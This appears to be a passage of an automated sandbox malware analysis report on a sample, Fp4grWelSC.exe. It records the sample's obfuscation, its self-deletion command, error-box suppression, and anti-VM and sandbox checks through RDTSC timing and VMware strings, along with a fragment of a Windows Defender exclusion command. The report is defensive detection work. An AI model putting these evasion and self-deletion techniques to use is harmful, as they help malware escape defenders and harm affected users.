          Source: Binary string: wntdll.pdbUGP source: Fp4grWelSC.exe, 00000004.00000002.764180454.00000000014F0000.00000040.00000001.sdmp, Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942277980.0000000003230000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942585836.000000000334F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Fp4grWelSC.exe, 00000004.00000002.766071483.00000000035D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000000.763461139.00000000011D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Fp4grWelSC.exe, 00000004.00000002.764180454.00000000014F0000.00000040.00000001.sdmp, Fp4grWelSC.exe, 00000004.00000002.764319659.000000000160F000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942277980.0000000003230000.00000040.00000001.sdmp, cmd.exe, 0000000B.00000002.942585836.000000000334F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdb source: Fp4grWelSC.exe, 00000004.00000002.766071483.00000000035D0000.00000040.00020000.sdmp, cmd.exe, cmd.exe, 0000000B.00000000.763461139.00000000011D0000.00000040.00020000.sdmp, cmd.exe, 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Fp4grWelSC.exe, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Fp4grWelSC.exe.370000.0.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Fp4grWelSC.exe.370000.0.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.7.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.9.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.5.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.1.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.Fp4grWelSC.exe.ab0000.1.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.2.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.3.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.Fp4grWelSC.exe.ab0000.0.unpack, Display.cs.Net Code: P_000001 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 0_2_0037F6EB push esp; iretd 0_2_0037F6EE
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041B822 push eax; ret 4_2_0041B828
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041B82B push eax; ret 4_2_0041B892
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041B88C push eax; ret 4_2_0041B892
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00418AC3 push esp; iretd 4_2_00418ACC
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041747D push edi; ret 4_2_0041747E
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041CD7E push es; ret 4_2_0041CD87
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0040CD0A push es; iretd 4_2_0040CD0B
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041A5E6 push ebp; ret 4_2_0041A5E7
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_0041B7D5 push eax; ret 4_2_0041B828
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_00ABF6EB push esp; iretd 4_2_00ABF6EE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E76BD push ecx; ret 11_2_011E76D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E76D1 push ecx; ret 11_2_011E76E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.74639201184

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: /c del "C:\Users\user\Desktop\Fp4grWelSC.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: /c del "C:\Users\user\Desktop\Fp4grWelSC.exe"Jump to behavior
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.28777e4.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.286f7d8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Fp4grWelSC.exe.28b65dc.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.689155208.000000000288A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Fp4grWelSC.exe PID: 7132, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Fp4grWelSC.exe, 00000000.00000002.689155208.000000000288A000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Fp4grWelSC.exe, 00000000.00000002.689155208.000000000288A000.00000004.00000001.sdmp, Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000608604 second address: 000000000060860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 000000000060899E second address: 00000000006089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe TID: 7136Thread sleep time: -34160s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe TID: 7160Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeCode function: 4_2_004088D0 rdtsc 4_2_004088D0
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011F31DC FindFirstFileW,FindNextFileW,FindClose,11_2_011F31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011D85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_011D85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,11_2_011E245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011DB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,11_2_011DB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 11_2_011E68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,11_2_011E68BA
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeThread delayed: delay time: 34160Jump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000016.00000003.896790069.0000000010860000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Br
          Source: explorer.exe, 00000016.00000003.891009930.0000000005E6A000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000016.00000003.878772068.000000000FE98000.00000004.00000001.sdmpBinary or memory string: 11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000016.00000003.871828614.00000000046A6000.00000004.00000001.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
          Source: Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000016.00000000.897232542.00000000101EE000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000016.00000003.891246769.000000000FE98000.00000004.00000001.sdmpBinary or memory string: e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000016.00000003.849361987.0000000005DD1000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%/
          Source: explorer.exe, 00000005.00000000.732278813.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.716929271.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000016.00000000.872239876.00000000045CB000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000016.00000000.872239876.00000000045CB000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000016.00000003.896790069.0000000010860000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000016.00000003.892662524.0000000004691000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000016.00000000.872239876.00000000045CB000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\?
          Source: explorer.exe, 00000005.00000000.725815512.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.716929271.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000016.00000003.902747265.00000000101EE000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}z
          Source: explorer.exe, 00000005.00000000.716995391.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000016.00000003.896978189.000000000464B000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0zN
          Source: explorer.exe, 00000016.00000000.872239876.00000000045CB000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Fp4grWelSC.exe, 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000016.00000000.872239876.00000000045CB000.00000004.00000001.sdmpBinary or memory string: 9Tm\Device\HarddiskVolume2\??\Volume{ef47ea26-ec76-4a6e-8680-9e53b539546d}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D: @@@@````
          Source: explorer.exe, 00000016.00000000.872239876.00000000045CB000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.725967558.0000000004791000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAX
